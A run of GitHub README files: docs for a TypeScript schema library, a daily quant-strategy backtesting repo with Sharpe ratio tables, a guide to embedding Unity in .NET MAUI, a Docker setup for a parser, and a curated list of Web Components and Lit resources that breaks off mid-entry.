'skex'; import type {Infer} from 'skex'; const schema = object ({ foo: string (), bar: number ().optional () }); type Schema = Infer<typeof schema>; // type Schema = { foo: string, bar?: number } ``` #### `Schema` This type matches the general shape of a schema node. Interface: ```ts type Schema<T = unknown> = { filter ( value: unknown, defaultable: false, quiet: true ): boolean, filter ( value: unknown, defaultable?: boolean, quiet?: false ): T, filter ( value: unknown, defaultable?: boolean, quiet?: boolean ): T | boolean, get (): Record<string, unknown>, test ( value: unknown ): value is T, traverse ( traverser: ( child: Schema, parent?: Schema, key?: string | number ) => void ): void }; ``` Usage: ```ts import type {Schema} from 'skex'; const matchSchema = <T> ( schema: Schema<T>, value: unknown ): value is T => { return schema.test ( value ); }; ``` ## Examples Some example usages of the library. #### JSON schema This schema matches any valid JSON value. ```ts import * as $ from 'skex'; const primitive = $.or ([ $.boolean (), $.null (), $.number (), $.string () ]); const json = $.or ([ primitive, $.array ( () => json ), $.record ( () => json ) ]); json.test ( '...' ); ``` #### Extract defaults This code extracts default values out of a schema. It makes some assumptions, it may need to be tweaked for your use case. ```ts const toDefaults = schema => { const defaults = {}; const values = new Map (); schema.traverse ( ( child, parent, key ) => { const valueChild = child.get ( 'default' ) || ( parent ? {} : defaults ); values.set ( child, valueChild ); const valueParent = values.get ( parent ); if ( !valueParent || !key ) return; valueParent[key] = valueChild; }); return defaults; }; const defaults = toDefault ( schema2 ); // { // editor: { // autosave: { // enabled: true, // interval: 60000 // }, // cursor: { // animated: false, // blinking: 'blink', // style: 'line' // } // } // } ``` #### Extract defaults This code extracts descriptions values out of a schema. It makes some assumptions, it may need to be tweaked for your use case. ```ts const toDescriptions = schema => { const descriptions = {}; const values = new Map (); schema.traverse ( ( child, parent, key ) => { const valueChild = child.get ( 'description' ) || ( parent ? {} : descriptions ); values.set ( child, valueChild ); const valueParent = values.get ( parent ); if ( !valueParent || !key ) return; valueParent[key] = valueChild; }); return descriptions; }; const descriptions = toDescriptions ( schema2 ); // { // editor: { // autosave: { // enabled: 'Whether autosaving is enabled or not', // interval: 'The mount of time to wait between autosaves' // }, // cursor: { // animated: 'Whether the cursor should move smoothly between positions or not', // blinking: 'The style used for blinking cursors', // style: 'The style used for rendering cursors' // } // } // } ``` ## License MIT © Fabio Spampinato
16
0
replacementAI/A-Backtest-A-Day
https://github.com/replacementAI/A-Backtest-A-Day
Join me everyday as I backtest a different quant strategy for the markets!
# A Backtest A Day Everyday I will backtest a different quant strategy for the markets! ## Backtested Strategies ### Best Equal Weight Long Only Strategies #### XS Short-term Reversal ![image](https://github.com/replacementAI/A-Backtest-A-Day/assets/55959390/0b92dae3-c490-4b90-be12-49f116aa7a12) | Description (Long Only) | Best Lookback (3 folds) | Sharpe | |------------------------------------------|-------------------------|--------| | [EW XS Long-Only Short-term Reversal][1] | 6 Days | 0.624 | | [EW TS Long-Only Short-term Reversal][2] | 4 Days | 0.595 | | [EW TS Long-Only Mean Reversion][3] | 111 Days | 0.582 | | [EW XS Long-Only Pos Skew][4] | 24 Days | 0.560 | | [EW XS Long-Only Low Vol][5] | 3 Days | 0.548 | | [EW XS Long-Only Pos Kurtosis][6] | 76 Days | 0.537 | | [EW XS Long-Only Neg Skew][7] | 107 Days | 0.504 | | [EW TS Long-Only Momentum][8] | 188 Days | 0.504 | | [EW XS Long-Only Momentum][9] | 124 Days | 0.503 | ### Best Equal Weight Long/Short Strategies #### XS Short-term Reversal ![image](https://github.com/replacementAI/A-Backtest-A-Day/assets/55959390/64de2acd-6530-4f24-9ee3-c44c15f67e91) | Description (Long Short) | Best Lookback (3 folds) | Sharpe | |-------------------------------------|-------------------------|--------| | [EW XS L/S Short-term Reversal][10] | 6 Days | 0.688 | | [EW TS L/S Short-term Reversal][11] | 4 Days | 0.522 | | [EW XS L/S Pos Skew][12] | 24 Days | 0.512 | | [EW TS L/S Mean Reversion][13] | 3 Days | 0.443 | | [EW XS L/S Neg Kurt][14] | 130 Days | 0.384 | | [EW XS L/S Neg Skew][15] | 107 Days | 0.355 | | [EW XS L/S Pos Kurt][16] | 4 Days | 0.288 | | [EW XS L/S Momentum][17] | 124 Days | 0.211 | | [EW TS L/S Momentum][18] | 188 Days | 0.181 | | [EW XS L/S Low Vol][19] | 17 Days | 0.103 | ### Best Ranked Long-Only Strategies #### XS Short-Term Reversal ![image](https://github.com/replacementAI/A-Backtest-A-Day/assets/55959390/8de6b6d0-bdf5-47c2-a6f8-87b632e3e6a9) | Description (Long-only) | Best Lookback (3 folds) | Sharpe | |-------------------------------------------|-------------------------|--------| | [RW XS Long-only Short-Term Reversal][20] | 3 Days | 0.659 | | [RW TS Long-only Short-Term Reversal][21] | 4 Days | 0.626 | | [RW XS Long-only Neg Skew][22] | 111 Days | 0.572 | | [RW XS Long-only Pos Skew][23] | 6 Days | 0.546 | | [RW XS Long-only Pos Kurt][24] | 5 Days | 0.524 | | [RW XS Long-Only Low Vol][25] | 13 Days | 0.513 | | [RW XS Long-only Momentum][26] | 108 Days | 0.444 | | [RW TS Long-only Momentum][27] | 191 Days | 0.439 | | [RW XS Long-only Neg Kurt][28] | 51 Days | 0.433 | ### Best Ranked Long/Short Strategies #### TS Short-term Reversal ![image](https://github.com/replacementAI/A-Backtest-A-Day/assets/55959390/b1ec2cfb-45fb-4e53-8bf1-1dcd393571e4) | Description (Long/Short) | Best Lookback (3 folds) | Sharpe | |-------------------------------------|-------------------------|--------| | [RW XS L/S Short-term Reversal][29] | 3 Days | 0.703 | | [RW TS L/S Short-term Reversal][30] | 4 Days | 0.566 | | [RW XS L/S Neg Skew][31] | 107 Days | 0.419 | | [RW XS L/S Pos Skew][32] | 7 Days | 0.374 | | [RW XS L/S Pos Kurt][33] | 23 Days | 0.268 | | [RW TS L/S Momentum][34] | 251 Days | 0.243 | | [RW XS L/S Low-vol][35] | 3 Days | 0.141 | | [RW XS L/S Neg Kurt][36] | 179 Days | 0.116 | | [RW XS L/S Momentum][37] | 241 Days | 0.033 | ## Methodology The main metric I will be using to measure a strategy is the sharpe ratio. What is the sharpe ratio? ### Sharpe Ratio The sharpe ratio is the average return of a strategy divided by its risk. Meaning if a strategy has high returns, and low risk, then it will have a high sharpe ratio. Why this metric and not total profit? Because total profit only keeps track of returns of a strategy, not risk, while sharpe ratio is calculated with both, allowing you to sleep better at night, instead of wondering if you are going to make 100% or lose 100% tomorrow. ### How to use strategy yourself 1. Either download the notebook or copy the code into a Python script 2. Remove the end date parameter from yf.download() 3. Print the last row of ```weighted_signal``` using ```print(weighted_signal.iloc[-1])``` (I will update the notebooks to already have this) 4. Go long the positive weights and (if the strategy is L/S,) short the negative weights ### Other First I will plot the cumulative return of each strategy over the entire sample, then I will the evaluate the sharpe of each strategy in a 3-fold cross validation to determine the best* parameters. The tickers used are the SPDR sector ETFs: XLE, XLU, XLB, XLK, XLI, XLV, XLF, XLP, and XLY. There are 3 reasons for using these groups of tickers: 1. Removes survivorship bias problem from using individual tickers 2. These ETFs were launched in 1998, giving a lot of data to work with. 3. Lastly, it is easier for an individual investor to attempt to replicate a strategy using just a few ETFs as opposed to having to a strategy using (for example) 500 stocks. ## Abbreviations - TS = Time Series - EW = Equal Weight - L\S = Long Short - XS = Cross Sectional - Vol = Volatility - Pos = Positive - Neg = Negative - Opp = Opposite - RW = Rank Weight ## Credits Code was provided by @quant_arb on Twitter, I added the cross-validation to try to better pick parameters. [1]: <https://github.com/replacementAI/A-Backtest-A-Day/blob/main/Sector/EW%20XS%20Long-Only%20Short-term%20Reversal.ipynb> [2]: <https://github.com/replacementAI/A-Backtest-A-Day/blob/main/Sector/EW%20TS%20Long-Only%20Short-term%20Reversal.ipynb> [3]: <https://github.com/replacementAI/A-Backtest-A-Day/blob/main/Sector/EW%20TS%20Long-Only%20Mean%20Reversion.ipynb> [4]: <https://github.com/replacementAI/A-Backtest-A-Day/blob/main/Sector/EW%20XS%20Long-Only%20Pos%20Skew.ipynb> [5]: <https://github.com/replacementAI/A-Backtest-A-Day/blob/main/Sector/EW%20XS%20Long-Only%20Low-Vol.ipynb> [6]: <https://github.com/replacementAI/A-Backtest-A-Day/blob/main/Sector/EW%20XS%20Long-Only%20Pos%20Kurt.ipynb> [7]: <https://github.com/replacementAI/A-Backtest-A-Day/blob/main/Sector/EW%20XS%20Long-Only%20Neg%20Skew.ipynb> [8]: <https://github.com/replacementAI/A-Backtest-A-Day/blob/main/Sector/EW%20TS%20Long-Only%20Momentum.ipynb> [9]: <https://github.com/replacementAI/A-Backtest-A-Day/blob/main/Sector/EW%20XS%20Long-Only%20Momentum.ipynb> [10]: <https://github.com/replacementAI/A-Backtest-A-Day/blob/main/Sector/EW%20XS%20L%5CS%20Short-term%20Reversal.ipynb> [11]: <https://github.com/replacementAI/A-Backtest-A-Day/blob/main/Sector/EW%20TS%20L%5CS%20Short-term%20Reversal.ipynb> [12]: <https://github.com/replacementAI/A-Backtest-A-Day/blob/main/Sector/EW%20XS%20L%5CS%20Pos%20Skew.ipynb> [13]: <https://github.com/replacementAI/A-Backtest-A-Day/blob/main/Sector/EW%20TS%20L%5CS%20Mean%20Reversion.ipynb> [14]: <https://github.com/replacementAI/A-Backtest-A-Day/blob/main/Sector/EW%20XS%20L%5CS%20Neg%20Kurt.ipynb> [15]: <https://github.com/replacementAI/A-Backtest-A-Day/blob/main/Sector/EW%20XS%20L%5CS%20Neg%20Skew.ipynb> [16]: <https://github.com/replacementAI/A-Backtest-A-Day/blob/main/Sector/EW%20XS%20L%5CS%20Pos%20Kurt.ipynb> [17]: <https://github.com/replacementAI/A-Backtest-A-Day/blob/main/Sector/EW%20XS%20L%5CS%20Momentum.ipynb> [18]: <https://github.com/replacementAI/A-Backtest-A-Day/blob/main/Sector/EW%20TS%20L%5CS%20Momentum.ipynb> [19]: <https://github.com/replacementAI/A-Backtest-A-Day/blob/main/Sector/EW-XS-L%5CS-Low-Vol.ipynb> [20]: <https://github.com/replacementAI/A-Backtest-A-Day/blob/main/Sector/RW%20XS%20Long-only%20Short-Term%20Reversal.ipynb> [21]: <https://github.com/replacementAI/A-Backtest-A-Day/blob/main/Sector/RW%20TS%20Long-Only%20Short-term%20Reversal.ipynb> [22]: <https://github.com/replacementAI/A-Backtest-A-Day/blob/main/Sector/RW%20XS%20Long-only%20Neg%20Skew.ipynb> [23]: <https://github.com/replacementAI/A-Backtest-A-Day/blob/main/Sector/RW%20XS%20Long-only%20Pos%20Skew.ipynb> [24]: <https://github.com/replacementAI/A-Backtest-A-Day/blob/main/Sector/RW%20XS%20Long-Only%20Pos%20Kurtosis.ipynb> [25]: <https://github.com/replacementAI/A-Backtest-A-Day/blob/main/Sector/RW%20XS%20Long-Only%20Low%20Vol.ipynb> [26]: <https://github.com/replacementAI/A-Backtest-A-Day/blob/main/Sector/RW%20XS%20Long-only%20Momentum.ipynb> [27]: <https://github.com/replacementAI/A-Backtest-A-Day/blob/main/Sector/RW%20TS%20Long-Only%20Momentum.ipynb> [28]: <https://github.com/replacementAI/A-Backtest-A-Day/blob/main/Sector/RW%20XS%20Long-only%20Neg%20Kurt.ipynb> [29]: <https://github.com/replacementAI/A-Backtest-A-Day/blob/main/Sector/RW%20XS%20L%5CS%20Short-term%20Reversal.ipynb> [30]: <https://github.com/replacementAI/A-Backtest-A-Day/blob/main/Sector/RW%20TS%20L%5CS%20Short-term%20Reversal.ipynb> [31]: <https://github.com/replacementAI/A-Backtest-A-Day/blob/main/Sector/RW%20XS%20L%5CS%20Neg%20Skew.ipynb> [32]: <https://github.com/replacementAI/A-Backtest-A-Day/blob/main/Sector/RW%20XS%20L%5CS%20Pos%20Skew.ipynb> [33]: <https://github.com/replacementAI/A-Backtest-A-Day/blob/main/Sector/RW%20XS%20L%5CS%20Pos%20Kurt.ipynb> [34]: <https://github.com/replacementAI/A-Backtest-A-Day/blob/main/Sector/RW%20TS%20L%5CS%20Momentum.ipynb> [35]: <https://github.com/replacementAI/A-Backtest-A-Day/blob/main/Sector/RW%20XS%20L%5CS%20Low-Vol.ipynb> [36]: <https://github.com/replacementAI/A-Backtest-A-Day/blob/main/Sector/RW%20XS%20L%5CS%20Neg%20Kurt.ipynb> [37]: <https://github.com/replacementAI/A-Backtest-A-Day/blob/main/Sector/RW%20XS%20L%5CS%20Momentum.ipynb>
10
1
matthewrdev/UnityUaal.Maui
https://github.com/matthewrdev/UnityUaal.Maui
Embedding the Unity game engine into .NET MAUI.
# UnityUaal.Maui This code sample demonstrates how to embed [Unity](https://unity.com) into [.NET MAUI](https://learn.microsoft.com/en-us/dotnet/maui/what-is-maui). <img src="img/unity-maui-embedding.gif" width="30%" height="30%"> See: https://github.com/Unity-Technologies/uaal-example Requires: * Unity (using 23.01.0a20) * Xcode * Android Studio * Visual Studio Mac with MAUI workloads installed Additionally, assumes familarity, or at least exposure to: * Native platform development using either Xcode or Android Studio. * .NET development using the Visual Studio family. * Unity development. If you want assistance in doing the Unity => MAUI integration, please reach out via: * Email: [email protected] * LinkedIn: https://www.linkedin.com/in/matthewrdev/ My time is somewhat limited but I'll provide assistance where I can. ## Why Embed Unity Into MAUI? Lets compare the strengths and weakness of app development using Unity vs .NET MAUI: **Unity** | Pro | Con | |---|---| | Fully fledged 3D engine | [Multiple In-Engine UI frameworks (no native UI support)](https://docs.unity3d.com/Manual/UI-system-compare.html) | | [Simplified augmented and virtual reality](https://unity.com/unity/features/ar) | Indirect access to native platform features (requires plugin) | | [Rich eco-system of 3D tools, plugins and assets](https://assetstore.unity.com) | [Dated versions of .NET](https://docs.unity3d.com/Manual/dotnetProfileSupport.html) | | | Difficult integration of SQLite | | | Limited Authentication Vendors | | | Highly specialised skillset to hire for. | **MAUI** | Pro | Con | |---|---| | Native UIs in a single language and project | No 3D engine support | | Easily access native features in C# | Access to 3D features requires complex per-platform implementation | | Use latest .NET version | | | Rich ecosystem of packages (nuget.org) | | | "Simple" binding and consumption of native libraries | | While Unity is an incredible platform to create 3D experiences, it is not a good choice for a modern, native apps. Unity to simplifies building augmented or virtual reality experiences, and gives us a full engine for rendering 3D environments however it's UI frameworks are limited as are its access to 3rd party vendors. On the other side, MAUI can create fully native iOS and Android apps. We gain access to the full .NET ecosystem, utilising the latest language features and a large libary of NuGet packages. However creating a 3d experience in MAUI requires writing a 3d rendering pipeline from near scratch... and this is not an easy task! Therefore, by combining these two technologies, we can get the best of both worlds: * Use an industry leader in games/3D technologies. * Fully x-plat code base in a native app. A fully native UI with no restrictions! * .NET across the whole stack. ## Integrating Unity Into MAUI ### Unity Project Overview The [Unity Project](/UnityApp) contains the following: * A single scene with some geometry. * A [script for controlling the camera via touch gestures](/UnityApp/Assets/Scripts/CameraZoom.cs). * A [script that defines APIs for sharing data from Unity to MAUI via the data bridge](/UnityApp/Assets/Scripts/Bridge.cs). * Native plugins for [iOS](/UnityApp/Assets/Plugins/iOS) and [Android](/UnityApp/Assets/Plugins/Android) that define APIs for sharing data from MAUI to Unity via the data bridge. ### Exporting Platform Projects When building a Unity app for Android and iOS, it exports itself as an Android gradle project and Xcode project. Each of these projects contains two parts: * The Unity app encapsulated into a standalone library. * The native "shim" project that references the Unity app library and starts it. Please follow the instructions in the Unity As A Library for [iOS](https://github.com/Unity-Technologies/uaal-example/blob/master/docs/ios.md) and [Android](https://github.com/Unity-Technologies/uaal-example/blob/master/docs/android.md) to create the native projects. ### Building Native Frameworks Once you have exported the native projects for iOS and Android, you will need to build the `framework` (iOS) and `aar` (Android) that will be consumed in .NET. **Android** To create the Android aar: * Open the generated gradle project in Android Studio. * Change the build type to `Release` by selecting **Build** => **Select Build Variant** and changing the **:unityLibrary** configuration to **Release** * Select **Build** => **Make Project** The created `aar` will be found under `[Exported Unity App Android Folder]/unityLibrary/build/outputs/aar/unityLibrary-release.aar`. Please note that you may need to install several additional components for Android Studio such as the NDK and cmake. **iOS** To create the iOS framework: * Open the generated project in XCode. * Change the build type to `Release` by selecting **Product** => **Scheme** => **Edit Scheme** and then selecting the **Unity Framework** item from the title of the window, then changing build configuration to **Release**. * Ensuring that the `Data` folder is included into the framework (click on item and set to public) * Ensuring that the Bridge.h is included and can accessed by our iOS binding (click on item and set to public). Make the following modifications to the main.mm and UnityFramework.h file: **Additions to Classes\main.mm** ```` + (UnityFramework*)loadUnity { UnityFramework* ufw = [UnityFramework getInstance]; if (![ufw appController]) { // unity is not initialized //[ufw setExecuteHeader: &_mh_execute_header]; } [ufw setDataBundleId: "com.unity3d.framework"]; return ufw; } - (char**)getArgumentArray { NSArray* args = [[NSProcessInfo processInfo]arguments]; unsigned count = [args count]; char** array = (char **)malloc((count+ 1) * sizeof(char*)); for (unsigned i = 0; i< count; i++) { array[i] = strdup([[args objectAtIndex:i] UTF8String]); } array[count] = NULL; return array; } - (unsigned)getArgumentCount { NSArray* args = [[NSProcessInfo processInfo]arguments]; unsigned count = [args count]; return count; } - (void)freeArray:(char **)array { if (array != NULL) { for (unsigned index = 0; array[index] != NULL; index++) { free(array[index]); } free(array); } } - (void)runEmbedded { char** argv = [self getArgumentArray]; unsigned argc = [self getArgumentCount]; NSDictionary* appLaunchOpts = [[NSDictionary alloc] init]; if (self->runCount) { // initialize from partial unload ( sceneLessMode & onPause ) UnityLoadApplicationFromSceneLessState(); [self pause: false]; [self showUnityWindow]; } else { // full initialization from ground up [self frameworkWarmup: argc argv: argv]; id app = [UIApplication sharedApplication]; id appCtrl = [[NSClassFromString([NSString stringWithUTF8String: AppControllerClassName]) alloc] init]; [appCtrl application: app didFinishLaunchingWithOptions: appLaunchOpts]; [appCtrl applicationWillEnterForeground: app]; [appCtrl applicationDidBecomeActive: app]; } self->runCount += 1; } //this method already exists, just add the difference - (void)unloadApplication { freeArray:([self getArgumentArray]); //added line of code UnityUnloadApplication(); } ```` Replace the `unloadApplication` implementation generated by Unity with the one above. **Additions to UnityFramework\UnityFramework.h** ``` + (UnityFramework*)loadUnity; - (void)runEmbedded; ``` These changes make it much simpler for Unity to run in embedded mode in our MAUI app. [Credit](https://github.com/FlorianAuer/Unity_as_a_Library-Xamarin-example/tree/master/UnityProject/buildiOS_modifications) Finally, select **Product** => **Build** to compile and generate the release framework. The created `framework` will be found under `[Exported Unity App iOS Folder]/Build/Products/Release-iphoneos/UnityFramework.framework`. Check that the outputted framework contains the following content: * The `Data` folder in the root of the framework. * The file `Headers/Bridge.h`. ### .NET Native Bindings Once you have built the `framework` and `aar` libraries, you will need to create an Android and iOS binding project alongside the For Android: * Create a new Android .NET binding project. * Create a new folder named **Jars** * Drag and drop the `unityLibrary-release.aar` into the **Jars** folder. For iOS: * Create a new iOS .NET binding project. * Right click on **Native References** and choose **Add Native Reference**. Locate the `UnityFramework.framework` release artifact from the previous step. * Open the ApiDefinition.cs file and replace with the following content: **ApiDefinitions.cs** ``` using System; using CoreAnimation; using Foundation; using ObjCRuntime; using UIKit; namespace iOSBridge { interface IUnityContentReceiver { } [BaseType(typeof(NSObject))] [Model] [Protocol] interface UnityContentReceiver { [Export("receiveUnityContent:eventContent:")] void ReceiveUnityContent ([PlainString] string eventName, [PlainString] string eventContent); } [BaseType(typeof(NSObject))] interface Bridge { [Static, Export("registerUnityContentReceiver:")] void RegisterUnityContentReceiver(IUnityContentReceiver contentReceiver); } [BaseType(typeof(NSObject))] interface UnityAppController : IUIApplicationDelegate { [Export("quitHandler", ArgumentSemantic.Copy)] Action QuitHandler { get; set; } [Export("rootView", ArgumentSemantic.Copy)] UIView RootView { get; } [Export("rootViewController", ArgumentSemantic.Copy)] UIViewController RootViewController { get; } } interface IUnityFrameworkListener { } [BaseType(typeof(NSObject))] [Model] [Protocol] interface UnityFrameworkListener { [Export("unityDidUnload:")] void UnityDidUnload(NSNotification notification); [Export("unityDidQuit:")] void UnityDidQuit(NSNotification notification); } [BaseType(typeof(NSObject))] interface UnityFramework { [Export("appController")] UnityAppController AppController(); [Static, Export("getInstance")] UnityFramework GetInstance(); [Export("setDataBundleId:")] void SetDataBundleId([PlainString] string bundleId); [Static, Export("loadUnity")] UnityFramework LoadUnity(); [Internal, Export("runUIApplicationMainWithArgc:argv:")] void RunUIApplicationMainWithArgc(int argc, IntPtr argv); [Export("runEmbedded")] void RunEmbedded(); [Internal, Export("runEmbeddedWithArgc:argv:appLaunchOpts:")] void RunEmbeddedWithArgc(int argc, IntPtr argv, NSDictionary options); [Export("unloadApplication")] void UnloadApplication(); [Export("quitApplication:")] void QuitApplication(int exitCode); [Export("registerFrameworkListener:")] void RegisterFrameworkListener(IUnityFrameworkListener obj); [Export("unregisterFrameworkListener:")] void UnregisterFrameworkListener(IUnityFrameworkListener obj); [Export("showUnityWindow")] void ShowUnityWindow(); [Export("pause:")] void Pause(bool pause); [Export("setExecuteHeader:")] void SetExecuteHeader(ref MachHeader header); [Export("sendMessageToGOWithName:functionName:message:")] void SendMessageToGOWithName([PlainString] string goName, [PlainString] string functionName, [PlainString] string msg); } } ``` * Open the StructsAndEnums.cs file and replace with the following content: ``` using System.Runtime.InteropServices; using Foundation; namespace iOSBridge { [StructLayout(LayoutKind.Sequential)] public struct MachHeader { public uint magic; /* mach magic number identifier */ public int cputype; /* cpu specifier ; cpu_type_t*/ public int cpusubtype; /* machine specifier ; cpu_subtype_t */ public uint filetype; /* type of file */ public uint ncmds; /* number of load commands */ public uint sizeofcmds; /* the size of all the load commands */ public uint flags; /* flags */ public uint reserved; /* reserved */ } } ``` ### Starting Unity In MAUI To start the Unity app in MAUI: **Android** Create a new `Activity` under `Platforms/Android/` named `UnityActivity` and replace it with the content defined in [/UnityActivity.cs](UnityUaalMaui/UnityUaalMaui/Platforms/Android/UnityActivity.cs). Please review the code carefully as this file: * Instantiates a new UnityPlayer and adds it as the root control of the actity. * Connects the core activity callbacks into the Unity Player. * Implements the data bridging API calls. To start Unity, start the activity with a new Intent: ``` public static void ShowUnityWindow() { var intent = new Android.Content.Intent(Microsoft.Maui.ApplicationModel.Platform.CurrentActivity, typeof(UnityActivity)); intent.AddFlags(Android.Content.ActivityFlags.ReorderToFront); Microsoft.Maui.ApplicationModel.Platform.CurrentActivity.StartActivity(intent); } ``` **iOS** To start Unity, first initialise the Unity framework: ``` private static UnityFramework framework = null; public static bool IsUnityInitialised => framework != null && framework.AppController() != null; private static void InitialiseUnity() { if (IsUnityInitialised) { return; } framework = UnityFramework.LoadUnity(); framework.RegisterFrameworkListener(new UnityBridge_UnityFrameworkListener()); Bridge.RegisterUnityContentReceiver(new UnityBridge_UnityContentReceiver()); framework.RunEmbedded(); } ``` Then open the Unity ViewController by calling `framework.ShowUnityWindow()`: ``` public static void ShowUnityWindow() { if (!IsUnityInitialised) { InitialiseUnity(); } if (framework != null) { framework.ShowUnityWindow(); } } ``` ### Communicating Between Unity and MAUI To send and receive content from Unity, please review the platform specific implementations of the UnityBridge: * [UnityBridge.Android.cs](UnityUaalMaui/UnityUaalMaui/Unity/UnityBridge.Android.cs) * [UnityBridge.iOS.cs](UnityUaalMaui/UnityUaalMaui/Unity/UnityBridge.iOS.cs) ## Known Issues + Limitations * Sometimes crashes on Android when *receiving* data from Unity when debugger attached. Does not happen in non-debugging builds. * Somestimes launching the Unity engine can freeze app on Android. No known cause or solution yet, still investigating.
62
1
verytinydever/b2b-parser
https://github.com/verytinydever/b2b-parser
null
## Parser setup # Build ``` $ docker build -t b2bparser:latest . ``` # Run ``` $ docker run -it -v /root/b2b-parser/logs:/tmp/logs --restart unless-stopped --net=host b2bparser ```
14
0
mvneerven/lit-list
https://github.com/mvneerven/lit-list
null
# Web Components & Lit Library - a Curated List of documentation A curated list of great documentation to get frontenders started with **Web Components & Lit**, with or without a framework. # Web Components basics Basically, Web Components consist of [three technologies](https://exyte.com/blog/web-components-technology "Overview of the Web components in 2021"): Custom elements, Shadow DOM, and HTML templates.- [Web Components | MDN](https://developer.mozilla.org/en-US/docs/Web/Web_Components "Web Components | MDN")\ *Simply the best source of truth about all Web Technology* - [webcomponents.org - Discuss & share web components](https://www.webcomponents.org/ "webcomponents.org - Discuss & share web components")\ *WebComponents.org aims to make it easy to share, discover, and reuse web components* - Open Web Components - [Open Web Components](https://open-wc.org/ "Open Web Components")\ *Well-known and experience-tested recommendations for their web component projects* - Project Scaffolding [Development: Generator: Open Web Components](https://open-wc.org/docs/development/generator/ "Development: Generator: Open Web Components") - What are Web Components (video)[](https://www.youtube.com/watch?v=83W63gTVlSk) # In-Depth Web Components ## Rob Eisenberg Rob Eisenberg is a respected voice in the Web Components community. He has worked on Angular at Google, on FAST at Microsoft, and is a member of the W3C Web Componnents Community Group. 1. [About Web Components](https://eisenbergeffect.medium.com/about-web-components-7b2a3ed67a78 "About Web Components") 2. [Debunking Web Component Myths and Misconceptions](https://eisenbergeffect.medium.com/debunking-web-component-myths-and-misconceptions-ea9bb13daf61 "Debunking Web Component Myths and Misconceptions") 4. [2023 State of Web Components](https://eisenbergeffect.medium.com/2023-state-of-web-components-c8feb21d4f16 "2023 State of Web Components") # Relevant Web Standards Web Components are an umbrella term. These are the underlying technologies you need to know to make the best of Web Components & Lit. - ES6 Module - [JavaScript modules - JavaScript | MDN](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Guide/Modules "JavaScript modules - JavaScript | MDN")\ *Module encapsulation, imports, exports* - String templates (ES6) - [Template literals (Template strings) - JavaScript | MDN](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Template_literals "Template literals (Template strings) - JavaScript | MDN")\ *Template-based rendering with variables* - CSS custom properties/variables - [Using CSS custom properties (variables) - CSS: Cascading Style Sheets | MDN](https://developer.mozilla.org/en-US/docs/Web/CSS/Using_CSS_custom_properties "Using CSS custom properties (variables) - CSS: Cascading Style Sheets | MDN")\ *Isolated styling with defined variables for external influence* - [customElements.define()](https://developer.mozilla.org/en-US/docs/web/api/customelementregistry/define "CustomElementRegistry.define() - Web APIs | MDN")\ *How to register a custom HTML element* - [Shadow DOM](https://developer.mozilla.org/en-US/docs/Web/API/Web_Components/Using_shadow_DOM) # Google's Lit Library > A really high level view of Lit would be that it's simply filling in the Gaps in the standards. Lit is a tiny (\<5Kb) library written by **Justin Fagnani** of Google, which was developed to fill a few gaps and make working with Web Components as easy as working with **React UI**, but without the need for expensive indirections like Virtual DOM and JSX.[](https://www.youtube.com/watch?v=ndZ8vcxNp0Q)> *A Lit component renders its template initially when it's added to the DOM on a page. After the initial render, any change to the component's reactive properties triggers an update cycle, re-rendering the component.* > *Lit batches updates to maximize performance and efficiency. Setting multiple properties at once triggers only one update, performed asynchronously at microtask timing.* > *During an update, only the parts of the DOM that change are re-rendered. Although Lit templates look like string interpolation, Lit parses and creates static HTML once, and then only updates changed values in expressions after that, making updates very efficient. - from* [*https://lit.dev/docs/components/rendering*](https://lit.dev/docs/components/rendering "Rendering – Lit") See [Lit for React Developers | Google Codelabs](https://codelabs.developers.google.com/codelabs/lit-2-for-react-devs#1 "Lit for React Developers | Google Codelabs")- [Lit](https://lit.dev/) (Simple. Fast. Web Components)\ *Lit Homepage* - [From Web Component to Lit Element | Google Codelabs](https://codelabs.developers.google.com/codelabs/the-lit-path#0 "From Web Component to Lit Element | Google Codelabs")\ *A course to take you from React to Lit expert* - [GitHub - web-padawan/awesome-lit: A curated list of awesome Lit resources.](https://github.com/web-padawan/awesome-lit "GitHub - web-padawan/awesome-lit: A curated list of awesome Lit resources.")\ *A curated list of wonderful Lit-related stuff* - [The Browser is your Framework: Building a PWA with only Web Components and Lit](https://javascript.plainenglish.io/the-browser-is-your-framework-building-a-pwa-with-only-web-components-and-lit-c91f0f86900d "The Browser is your Framework: Building a PWA with only Web Components and Lit")\ *My article on creating PWAs with only Web Components and Lit, and the* [*NPM initializer*](https://www.npmjs.com/package/create-lit-pwa "create-lit-pwa") [*Artem Maiorov*](https://www.linkedin.com/in/artem-maiorov-792a7b3a/) *created with me.\ See also* [*the list of LinkedIn Posts*](https://www.linkedin.com/feed/hashtag/es6pwa/) *around this approach.* - [Some things to know when developing with Lit](https://open-wc.org/blog/some-things-to-know-when-developing-with-lit/) # Component Libraries & Design Systems ## Design System Tools- Custom Element Manifest - [Getting Started: Custom Elements Manifest](https://custom-elements-manifest.open-wc.org/analyzer/getting-started/ "Getting Started: Custom Elements Manifest") - Storybook - [Storybook: Frontend workshop for UI development](https://storybook.js.org/) - [Getting Started With Storybook Without a JavaScript Framework | by RayRay | Better Programming](https://betterprogramming.pub/getting-started-with-storybook-without-a-javascript-framework-c2968d3f3d9f) ## Web Components Component Libraries Ready-to-use UI component libraries to use in any project. - Microsoft Fast - [FAST](https://www.fast.design/ "FAST") - Shoelace - [Shoelace](https://shoelace.style/ "Shoelace") - Ionic - [Ionic Framework - The Cross-Platform App Development Leader](https://ionicframework.com/ "Ionic Framework - The Cross-Platform App Development Leader") - Google Material: [material-components/material-web: Material Design Web Components (github.com)](https://github.com/material-components/material-web)\ *Note: v3 is currently in development (April 2023)* - Adobe (Spectrum) - [Spectrum Web Components - Spectrum Web Components](https://opensource.adobe.com/spectrum-web-components/ "Spectrum Web Components - Spectrum Web Components") - RedHat (Patternfly) - [PatternFly 4](https://www.patternfly.org/v4/ "PatternFly 4") - AWS (Amplify) - [Amplify UI Components - AWS Amplify Docs](https://docs.amplify.aws/ui/ "Amplify UI Components - AWS Amplify Docs") - Vaadin - [GitHub - vaadin/web-components: A set of high-quality...](https://github.com/vaadin/web-components "GitHub - vaadin/web-components: A set of high-quality standards based web components for enterprise web applications. Part of Vaadin 20+") ## Web Component Design Systems / Discovery - <https://www.webcomponents.org/> - <https://webcomponents.dev/> - <https://github.com/web-padawan/awesome-web-components> # Web Components Only Approach (not using a framework) When you decide not to use any existing framework, you have to decide what to use for a few common areas normally taken care of by the framework, such as state management and routing. ## General Web Capabilities - [What Web Can Do Today](https://whatwebcando.today/ "What Web Can Do Today") - [What PWA Can Do Today](https://whatpwacando.today/ "What PWA Can 